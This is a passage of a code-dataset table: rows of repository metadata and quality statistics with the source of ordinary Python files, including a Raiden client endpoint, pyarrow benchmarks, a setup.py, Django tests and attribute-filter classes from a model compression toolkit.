hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
918902fd69d740a78465a7c0e8ff7c9040a2834a | 1,448 | py | Python | raiden_client/endpoints/connections_connect.py | s0b0lev/raiden-client-python | 4eecdda10650f081e4449449949067af6356d542 | [
"MIT"
] | 3 | 2019-08-01T12:47:16.000Z | 2020-07-05T15:28:53.000Z | raiden_client/endpoints/connections_connect.py | s0b0lev/raiden-client-python | 4eecdda10650f081e4449449949067af6356d542 | [
"MIT"
] | 17 | 2019-08-01T07:51:58.000Z | 2020-05-29T09:48:37.000Z | raiden_client/endpoints/connections_connect.py | s0b0lev/raiden-client-python | 4eecdda10650f081e4449449949067af6356d542 | [
"MIT"
] | null | null | null | from typing import Any, Dict
from raiden_client import utils
from raiden_client.endpoints import BaseEndpoint
class Connect(BaseEndpoint):
"""Automatically join a token network.
PUT /api/(version)/connections/(token_address)
"""
connection = None
def __init__(self,
token_address: str,
funds: int,
initial_channel_target: int = None,
joinable_funds_target: float = None) -> None:
self.token_address = utils.normalize_address_eip55(token_address)
self.funds = funds
self.initial_channel_target = initial_channel_target
self.joinable_funds_target = joinable_funds_target
@property
def name(self) -> str:
return "connect"
@property
def endpoint(self) -> str:
return f"/connections/{self.token_address}"
@property
def method(self) -> str:
return "put"
def payload(self) -> Dict[str, Any]:
data: Dict[str, Any] = {"funds": self.funds}
if self.initial_channel_target:
data["initial_channel_target"] = self.initial_channel_target
if self.joinable_funds_target:
data["joinable_funds_target"] = self.joinable_funds_target
return data
def from_dict(self, response: Dict[str, Any]) -> None:
self.connection = response
def to_dict(self) -> Dict[str, Any]:
return {"connection": self.connection}
| 28.392157 | 73 | 0.642265 | 166 | 1,448 | 5.36747 | 0.289157 | 0.094276 | 0.13468 | 0.080808 | 0.065095 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001874 | 0.263122 | 1,448 | 50 | 74 | 28.96 | 0.833177 | 0.05732 | 0 | 0.088235 | 0 | 0 | 0.074815 | 0.056296 | 0 | 0 | 0 | 0 | 0 | 1 | 0.205882 | false | 0 | 0.088235 | 0.117647 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
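The `Connect` endpoint in the row above builds its PUT body from one required field and two optional ones, adding the optional keys only when they are set. A self-contained sketch of that payload pattern (the helper name here is illustrative, not part of the raiden client):

```python
from typing import Any, Dict, Optional


def build_connect_payload(funds: int,
                          initial_channel_target: Optional[int] = None,
                          joinable_funds_target: Optional[float] = None) -> Dict[str, Any]:
    """Mirror of Connect.payload(): always send 'funds', add optional keys only when truthy."""
    data: Dict[str, Any] = {"funds": funds}
    if initial_channel_target:
        data["initial_channel_target"] = initial_channel_target
    if joinable_funds_target:
        data["joinable_funds_target"] = joinable_funds_target
    return data


print(build_connect_payload(1000, initial_channel_target=3))
# → {'funds': 1000, 'initial_channel_target': 3}
```

Note that the truthiness checks mean an explicit `initial_channel_target=0` would be silently dropped from the payload; testing `is not None` would be the stricter choice.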
91899bf4d3ae7e46d7ab666e1b29186df70d9b7a | 1,152 | py | Python | windows/__init__.py | kimtaehong/PythonForWindows | d04eed1754e2e23474213b89580d68e1b73c3fe4 | [
"BSD-3-Clause"
] | 1 | 2020-08-02T09:35:14.000Z | 2020-08-02T09:35:14.000Z | windows/__init__.py | kimtaehong/PythonForWindows | d04eed1754e2e23474213b89580d68e1b73c3fe4 | [
"BSD-3-Clause"
] | null | null | null | windows/__init__.py | kimtaehong/PythonForWindows | d04eed1754e2e23474213b89580d68e1b73c3fe4 | [
"BSD-3-Clause"
] | 1 | 2020-09-21T14:46:44.000Z | 2020-09-21T14:46:44.000Z | """
Python for Windows
A lot of python object to help navigate windows stuff
Exported:
system : :class:`windows.winobject.System`
current_process : :class:`windows.winobject.CurrentProcess`
current_thread : :class:`windows.winobject.CurrentThread`
"""
# check we are on windows
import sys
if sys.platform != "win32":
raise NotImplementedError("It's called PythonForWindows not PythonFor{0}".format(sys.platform.capitalize()))
import warnings
warnings.filterwarnings('once', category=DeprecationWarning, module=__name__)
from windows import winproxy
from windows import winobject
from .winobject.system import System
from .winobject.process import CurrentProcess, CurrentThread, WinProcess, WinThread
from .winobject.file import WinFile
system = System()
current_process = CurrentProcess()
current_thread = CurrentThread()
del System
del CurrentProcess
del CurrentThread
# Late import: other imports should go here
# Do not move it: risk of circular import
import windows.utils
import windows.wintrust
import windows.syswow64
import windows.com
import windows.pipe
__all__ = ["system", 'current_process', 'current_thread']
| 24 | 112 | 0.788194 | 140 | 1,152 | 6.385714 | 0.5 | 0.072707 | 0.07047 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00498 | 0.128472 | 1,152 | 47 | 113 | 24.510638 | 0.885458 | 0.317708 | 0 | 0 | 0 | 0 | 0.114691 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.545455 | 0 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
91a2e33b80eabbb7ab7ccd98f223bba69fe010db | 421 | py | Python | dbag/dbag_metric_types.py | PolicyStat/dbag | 8541d692f52e23242ac7f5669903569f5927eece | [
"MIT"
] | 1 | 2019-09-15T16:47:47.000Z | 2019-09-15T16:47:47.000Z | dbag/dbag_metric_types.py | PolicyStat/dbag | 8541d692f52e23242ac7f5669903569f5927eece | [
"MIT"
] | 4 | 2015-12-18T18:45:18.000Z | 2019-07-18T18:58:52.000Z | dbag/dbag_metric_types.py | PolicyStat/dbag | 8541d692f52e23242ac7f5669903569f5927eece | [
"MIT"
] | null | null | null | from django.conf import settings
from dbag import dbag_manager
from dbag.metric_types import QueryMetric
class UserMetric(QueryMetric):
query_model = settings.AUTH_USER_MODEL
dbag_manager.register_metric_type('users_metric', UserMetric)
class ActiveUsersCount(UserMetric):
default_query_filter = {'key': 'is_active', 'value': True}
dbag_manager.register_metric_type('active_users_count', ActiveUsersCount)
| 24.764706 | 73 | 0.814727 | 53 | 421 | 6.150943 | 0.528302 | 0.101227 | 0.116564 | 0.153374 | 0.177914 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.104513 | 421 | 16 | 74 | 26.3125 | 0.864721 | 0 | 0 | 0 | 0 | 0 | 0.111639 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.777778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
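The dbag row above registers metric subclasses with a module-level manager at import time. A minimal, self-contained sketch of that registry pattern (class and method names are hypothetical stand-ins for `dbag_manager.register_metric_type`):

```python
class MetricManager:
    """Tiny registry mapping a string slug to a metric class."""

    def __init__(self):
        self._types = {}

    def register_metric_type(self, slug, metric_cls):
        # Called at import time by each module that defines a metric.
        self._types[slug] = metric_cls

    def get_metric_type(self, slug):
        return self._types[slug]


manager = MetricManager()


class UserMetric:
    pass


manager.register_metric_type("users_metric", UserMetric)
print(manager.get_metric_type("users_metric") is UserMetric)  # → True
```

Registering at import time keeps metric definitions decentralized, but it does mean the registry is only complete once every metric module has been imported.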
91a568129f1c208a2106665459edcdb528524d07 | 481 | py | Python | deckz/cli/watch_standalones.py | m09/deckz | 0f97ef2a43c2c714ac18173a4fe3266cccba31e2 | [
"Apache-2.0"
] | null | null | null | deckz/cli/watch_standalones.py | m09/deckz | 0f97ef2a43c2c714ac18173a4fe3266cccba31e2 | [
"Apache-2.0"
] | 41 | 2020-04-06T13:49:18.000Z | 2020-12-24T11:14:47.000Z | deckz/cli/watch_standalones.py | m09/deckz | 0f97ef2a43c2c714ac18173a4fe3266cccba31e2 | [
"Apache-2.0"
] | null | null | null | from logging import getLogger
from pathlib import Path
from deckz.cli import app
from deckz.paths import GlobalPaths
from deckz.watching import watch_standalones as watching_watch_standalones
_logger = getLogger(__name__)
@app.command()
def watch_standalones(minimum_delay: int = 5, current_dir: Path = Path(".")) -> None:
"""Compile standalones on change."""
watching_watch_standalones(
minimum_delay, current_dir, GlobalPaths.from_defaults(current_dir)
)
| 28.294118 | 85 | 0.773389 | 61 | 481 | 5.819672 | 0.491803 | 0.180282 | 0.135211 | 0.157746 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002433 | 0.14553 | 481 | 16 | 86 | 30.0625 | 0.861314 | 0.06237 | 0 | 0 | 0 | 0 | 0.002247 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.454545 | 0 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
91ae994aab8db1081b64d37bba1ddd56b64104cd | 3,202 | py | Python | setup.py | easyScience/easy-Crystallography | c551cc13077108033befde710387afcd09f3e557 | [
"BSD-3-Clause"
] | null | null | null | setup.py | easyScience/easy-Crystallography | c551cc13077108033befde710387afcd09f3e557 | [
"BSD-3-Clause"
] | 13 | 2022-01-04T18:14:08.000Z | 2022-03-31T22:23:10.000Z | setup.py | easyScience/easy-Crystallography | c551cc13077108033befde710387afcd09f3e557 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from setuptools import setup
packages = [
"easyCrystallography",
"easyCrystallography.Components",
"easyCrystallography.Elements",
"easyCrystallography.Structures",
"easyCrystallography.Symmetry",
"easyCrystallography.io",
]
package_data = {"": ["*"]}
install_requires = [
"easysciencecore>=0.2.2"
]
setup_kwargs = {
"name": "easycrystallography",
"version": "0.1.1",
"description": "Crystallography in easyScience",
"long_description": '# [![License][50]][51] [![Release][32]][33] [![Downloads][70]][71] [![CI Build][20]][21] \n\n[![CodeFactor][83]][84] [![Lines of code][81]](<>) [![Total lines][80]](<>) [![Files][82]](<>)\n\n\n<img height="80"><img src="https://raw.githubusercontent.com/easyScience/easyCore/master/resources/images/ec_logo.svg" height="65">\n\n**easyCore** is the foundation of the *easyScience* universe, providing the building blocks for libraries and applications which aim to make scientific data simulation and analysis easier.\n\n## Install\n\n**easyCore** can be downloaded using pip:\n\n```pip install easysciencecore```\n\nOr direct from the repository:\n\n```pip install https://github.com/easyScience/easyCore```\n\n## Test\n\nAfter installation, launch the test suite:\n\n```python -m pytest```\n\n## Documentation\n\nDocumentation can be found at:\n\n[https://easyScience.github.io/easyCore](https://easyScience.github.io/easyCore)\n\n## Contributing\nWe absolutely welcome contributions. 
**easyCore** is maintained by the ESS and on a volunteer basis and thus we need to foster a community that can support user questions and develop new features to make this software a useful tool for all users while encouraging every member of the community to share their ideas.\n\n## License\nWhile **easyCore** is under the BSD-3 license, DFO_LS is subject to the GPL license.\n\n<!---CI Build Status--->\n\n[20]: https://github.com/easyScience/easyCore/workflows/CI%20using%20pip/badge.svg\n\n[21]: https://github.com/easyScience/easyCore/actions\n\n\n<!---Release--->\n\n[32]: https://img.shields.io/pypi/v/easyScienceCore.svg\n\n[33]: https://pypi.org/project/easyScienceCore\n\n\n<!---License--->\n\n[50]: https://img.shields.io/github/license/easyScience/easyCore.svg\n\n[51]: https://github.com/easyScience/easyCore/blob/master/LICENSE.md\n\n\n<!---Downloads--->\n\n[70]: https://img.shields.io/pypi/dm/easyScienceCore.svg\n\n[71]: https://pypi.org/project/easyScienceCore\n\n<!---Code statistics--->\n\n[80]: https://tokei.rs/b1/github/easyScience/easyCore\n\n[81]: https://tokei.rs/b1/github/easyScience/easyCore?category=code\n\n[82]: https://tokei.rs/b1/github/easyScience/easyCore?category=files\n\n[83]: https://www.codefactor.io/repository/github/easyscience/easycore/badge\n\n[84]: https://www.codefactor.io/repository/github/easyscience/easycore\n',
"author": "Simon Ward",
"author_email": None,
"maintainer": None,
"maintainer_email": None,
"url": "https://github.com/easyScience/easyCrystallography",
"packages": packages,
"package_data": package_data,
"install_requires": install_requires,
"python_requires": ">=3.7,<3.11",
}
setup(**setup_kwargs)
| 86.540541 | 2,377 | 0.718926 | 460 | 3,202 | 4.973913 | 0.4 | 0.030594 | 0.048077 | 0.054633 | 0.241696 | 0.137675 | 0.137675 | 0.089161 | 0 | 0 | 0 | 0.026171 | 0.093067 | 3,202 | 36 | 2,378 | 88.944444 | 0.761708 | 0.006558 | 0 | 0 | 0 | 0.034483 | 0.877949 | 0.121422 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.034483 | 0 | 0.034483 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
91b15ecf522c5f6659ca4ec04b9e192aebb6141d | 2,687 | py | Python | python/benchmarks/convert_builtins.py | hrabeale/arrow | 4009b62086dfa43a4fd8bfa714772716e6531c6f | [
"Apache-2.0"
] | null | null | null | python/benchmarks/convert_builtins.py | hrabeale/arrow | 4009b62086dfa43a4fd8bfa714772716e6531c6f | [
"Apache-2.0"
] | null | null | null | python/benchmarks/convert_builtins.py | hrabeale/arrow | 4009b62086dfa43a4fd8bfa714772716e6531c6f | [
"Apache-2.0"
] | null | null | null | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import pyarrow as pa
from . import common
# TODO:
# - test dates and times
class ConvertPyListToArray(object):
"""
Benchmark pa.array(list of values, type=...)
"""
size = 10 ** 5
types = ('int32', 'uint32', 'int64', 'uint64',
'float32', 'float64', 'bool', 'decimal',
'binary', 'binary10', 'ascii', 'unicode',
'int64 list', 'struct', 'struct from tuples')
param_names = ['type']
params = [types]
def setup(self, type_name):
gen = common.BuiltinsGenerator()
self.ty, self.data = gen.get_type_and_builtins(self.size, type_name)
def time_convert(self, *args):
pa.array(self.data, type=self.ty)
class InferPyListToArray(object):
"""
Benchmark pa.array(list of values) with type inference
"""
size = 10 ** 5
types = ('int64', 'float64', 'bool', 'decimal', 'binary', 'ascii',
'unicode', 'int64 list')
# TODO add 'struct' when supported
param_names = ['type']
params = [types]
def setup(self, type_name):
gen = common.BuiltinsGenerator()
self.ty, self.data = gen.get_type_and_builtins(self.size, type_name)
def time_infer(self, *args):
arr = pa.array(self.data)
assert arr.type == self.ty
class ConvertArrayToPyList(object):
"""
Benchmark pa.array.to_pylist()
"""
size = 10 ** 5
types = ('int32', 'uint32', 'int64', 'uint64',
'float32', 'float64', 'bool', 'decimal',
'binary', 'binary10', 'ascii', 'unicode',
'int64 list', 'struct')
param_names = ['type']
params = [types]
def setup(self, type_name):
gen = common.BuiltinsGenerator()
self.ty, self.data = gen.get_type_and_builtins(self.size, type_name)
self.arr = pa.array(self.data, type=self.ty)
def time_convert(self, *args):
self.arr.to_pylist()
| 30.191011 | 76 | 0.639747 | 344 | 2,687 | 4.930233 | 0.386628 | 0.035377 | 0.030071 | 0.038915 | 0.445755 | 0.411557 | 0.411557 | 0.341981 | 0.341981 | 0.341981 | 0 | 0.024781 | 0.23409 | 2,687 | 88 | 77 | 30.534091 | 0.79932 | 0.352066 | 0 | 0.634146 | 0 | 0 | 0.154442 | 0 | 0 | 0 | 0 | 0.022727 | 0.02439 | 1 | 0.146341 | false | 0 | 0.04878 | 0 | 0.560976 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
91b7d869fa9953036a4b5438c2880c1f0721e82f | 1,317 | py | Python | codes/globo_videos_cuts/core/tests/models/processed_video_model_test_case.py | lariodiniz/teste_meta | 3bf043df3ee76871d68a3f8aea7c3ecd53765fec | [
"MIT"
] | null | null | null | codes/globo_videos_cuts/core/tests/models/processed_video_model_test_case.py | lariodiniz/teste_meta | 3bf043df3ee76871d68a3f8aea7c3ecd53765fec | [
"MIT"
] | null | null | null | codes/globo_videos_cuts/core/tests/models/processed_video_model_test_case.py | lariodiniz/teste_meta | 3bf043df3ee76871d68a3f8aea7c3ecd53765fec | [
"MIT"
] | null | null | null | # coding: utf-8
__author__ = "Lário dos Santos Diniz"
from django.test import TestCase
from model_mommy import mommy
from core.models import ProcessedVideo
class ProcessedVideoModelTestCase(TestCase):
"""Class Testing Model processed """
def setUp(self):
"""
Initial Test Settings
"""
self.processed_video = mommy.make(ProcessedVideo)
def tearDown(self):
"""Final method"""
self.processed_video.delete()
def test_there_are_fields(self):
"""test the fields the model"""
        self.assertTrue('title' in dir(ProcessedVideo), 'Class ProcessedVideo does not have the field title')
        self.assertTrue('duration' in dir(ProcessedVideo), 'Class ProcessedVideo does not have the field duration')
        self.assertTrue('name' in dir(ProcessedVideo), 'Class ProcessedVideo does not have the field name')
def test_there_is_a_program(self):
"""test if you are creating a Program correctly"""
self.assertEquals(ProcessedVideo.objects.count(), 1)
self.assertEquals(ProcessedVideo.objects.all()[0].title, self.processed_video.title)
self.assertEquals(ProcessedVideo.objects.all()[0].duration, self.processed_video.duration)
self.assertEquals(ProcessedVideo.objects.all()[0].name, self.processed_video.name)
| 35.594595 | 110 | 0.700076 | 160 | 1,317 | 5.64375 | 0.39375 | 0.071982 | 0.099668 | 0.163898 | 0.302326 | 0.302326 | 0.166113 | 0.166113 | 0.166113 | 0.166113 | 0 | 0.004713 | 0.194381 | 1,317 | 36 | 111 | 36.583333 | 0.846371 | 0.114655 | 0 | 0 | 0 | 0 | 0.156863 | 0 | 0 | 0 | 0 | 0 | 0.388889 | 1 | 0.222222 | false | 0 | 0.166667 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
91b8992a13b8b45015222e13beff8de3feab39c5 | 8,270 | py | Python | model_compression_toolkit/common/target_platform/targetplatform2framework/attribute_filter.py | haihabi/model_optimization | 97372a9596378bb2287c59f1180b5059f741b2d6 | [
"Apache-2.0"
] | 42 | 2021-10-31T10:17:49.000Z | 2022-03-21T08:51:46.000Z | model_compression_toolkit/common/target_platform/targetplatform2framework/attribute_filter.py | haihabi/model_optimization | 97372a9596378bb2287c59f1180b5059f741b2d6 | [
"Apache-2.0"
] | 6 | 2021-10-31T15:06:03.000Z | 2022-03-31T10:32:53.000Z | model_compression_toolkit/common/target_platform/targetplatform2framework/attribute_filter.py | haihabi/model_optimization | 97372a9596378bb2287c59f1180b5059f741b2d6 | [
"Apache-2.0"
] | 18 | 2021-11-01T12:16:43.000Z | 2022-03-25T16:52:37.000Z | # Copyright 2022 Sony Semiconductors Israel, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import operator
from typing import Any, Callable, Dict
class Filter:
"""
Filter a layer configuration by its attributes.
"""
def match(self, layer_config: Dict[str, Any]):
"""
Check whether the passed configuration matches the filter.
Args:
layer_config: Layer's configuration to check.
Returns:
Whether the passed configuration matches the filter or not.
"""
raise Exception('Filter did not implement match')
class AttributeFilter(Filter):
"""
Wrap a key, value and an operation to filter a layer's configuration according to.
If the layer's configuration has the key, and its' value matches when applying the operator,
the configuration matches the AttributeFilter.
"""
def __init__(self,
attr: str,
value: Any,
op: Callable):
"""
Args:
attr (str): Attribute to filter a layer's configuration according to.
value (Any): Value to filter to filter a layer's configuration according to.
op (Callable): Operator to check if when applied on a layer's configuration value it holds with regard to the filter's value field.
"""
self.attr = attr
self.value = value
self.op = op
def __eq__(self, other: Any) -> bool:
"""
Check whether an object is equal to the AttributeFilter or not.
Args:
other: Object to check if it is equal to the AttributeFilter or not.
Returns:
Whether the object is equal to the AttributeFilter or not.
"""
if not isinstance(other, AttributeFilter):
return False
return self.attr == other.attr and \
self.value == other.value and \
self.op == other.op
def __or__(self, other: Any):
"""
Create a filter that combines multiple AttributeFilters with a logic OR between them.
Args:
other: Filter to add to self with logic OR.
Returns:
OrAttributeFilter that filters with OR between the current AttributeFilter and the passed AttributeFilter.
"""
if not isinstance(other, AttributeFilter):
raise Exception("Not an attribute filter. Can not run an OR operation.")
return OrAttributeFilter(self, other)
def __and__(self, other: Any):
"""
Create a filter that combines multiple AttributeFilters with a logic AND between them.
Args:
other: Filter to add to self with logic AND.
Returns:
AndAttributeFilter that filters with AND between the current AttributeFilter and the passed AttributeFilter.
"""
if not isinstance(other, AttributeFilter):
raise Exception("Not an attribute filter. Can not run an AND operation.")
return AndAttributeFilter(self, other)
def match(self,
layer_config: Dict[str, Any]) -> bool:
"""
Check whether the passed configuration matches the filter.
Args:
layer_config: Layer's configuration to check.
Returns:
Whether the passed configuration matches the filter or not.
"""
if self.attr in layer_config:
return self.op(layer_config.get(self.attr), self.value)
return False
def op_as_str(self):
"""
Returns: A string representation for the filter.
"""
raise Exception("Filter must implement op_as_str ")
def __repr__(self):
return f'{self.attr} {self.op_as_str()} {self.value}'
class OrAttributeFilter(Filter):
"""
AttributeFilter to filter by multiple filters with logic OR between them.
"""
def __init__(self, *filters: AttributeFilter):
"""
Args:
*filters: List of filters to apply a logic OR between them when filtering.
"""
self.filters = filters
def match(self,
layer_config: Dict[str, Any]) -> bool:
"""
Check whether a layer's configuration matches the filter or not.
Args:
layer_config: Layer's configuration to check.
Returns:
Whether a layer's configuration matches the filter or not.
"""
for f in self.filters:
if f.match(layer_config):
return True
return False
def __repr__(self):
"""
Returns: A string representation for the filter.
"""
return ' | '.join([str(f) for f in self.filters])
class AndAttributeFilter(Filter):
"""
AttributeFilter to filter by multiple filters with logic AND between them.
"""
def __init__(self, *filters):
self.filters = filters
def match(self,
layer_config: Dict[str, Any]) -> bool:
"""
Check whether the passed configuration matches the filter.
Args:
layer_config: Layer's configuration to check.
Returns:
Whether the passed configuration matches the filter or not.
"""
for f in self.filters:
if not f.match(layer_config):
return False
return True
def __repr__(self):
"""
Returns: A string representation for the filter.
"""
return ' & '.join([str(f) for f in self.filters])
class Greater(AttributeFilter):
"""
Filter configurations such that it matches configurations
that have an attribute with a value that is greater than the value that Greater holds.
"""
def __init__(self,
attr: str,
value: Any):
super().__init__(attr=attr, value=value, op=operator.gt)
def op_as_str(self): return ">"
class GreaterEq(AttributeFilter):
"""
Filter configurations such that it matches configurations
that have an attribute with a value that is greater or equal than the value that GreaterEq holds.
"""
def __init__(self, attr: str, value: Any):
super().__init__(attr=attr, value=value, op=operator.ge)
def op_as_str(self): return ">="
class Smaller(AttributeFilter):
"""
Filter configurations such that it matches configurations that have an attribute with a value that is smaller than the value that Smaller holds.
"""
def __init__(self, attr: str, value: Any):
super().__init__(attr=attr, value=value, op=operator.lt)
def op_as_str(self): return "<"
class SmallerEq(AttributeFilter):
"""
Filter configurations such that it matches configurations that have an attribute with a value that is smaller or equal than the value that SmallerEq holds.
"""
def __init__(self, attr: str, value: Any):
super().__init__(attr=attr, value=value, op=operator.le)
def op_as_str(self): return "<="
class NotEq(AttributeFilter):
"""
